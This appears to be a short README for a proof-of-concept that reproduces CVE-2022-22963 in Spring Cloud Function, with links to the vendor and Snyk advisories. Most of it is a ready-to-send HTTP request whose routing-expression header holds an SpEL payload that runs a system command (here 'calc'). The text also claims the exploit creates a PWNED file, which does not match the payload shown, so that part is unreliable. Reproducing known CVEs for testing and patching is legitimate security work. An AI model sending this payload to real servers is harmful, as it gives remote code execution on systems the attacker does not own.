Minimal example to reproduce CVE-2022-22963 remote code execution in org.springframework.cloud:spring-cloud-function-core.
直接用idea 打开启动就可以了POST /xxx HTTP/1.1
Host: test.com:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc")
Content-Type: application/x-www-form-urlencoded
Content-Length: 3As a result of the exploit file PWNED will be crated nearby pom.xml.
- Original advisory: https://tanzu.vmware.com/security/cve-2022-22963
- Snyk advisory: https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORKCLOUD-2436645
- This PoC is based on: https://github.com/Pizz33/Spring-Cloud-Function-SpEL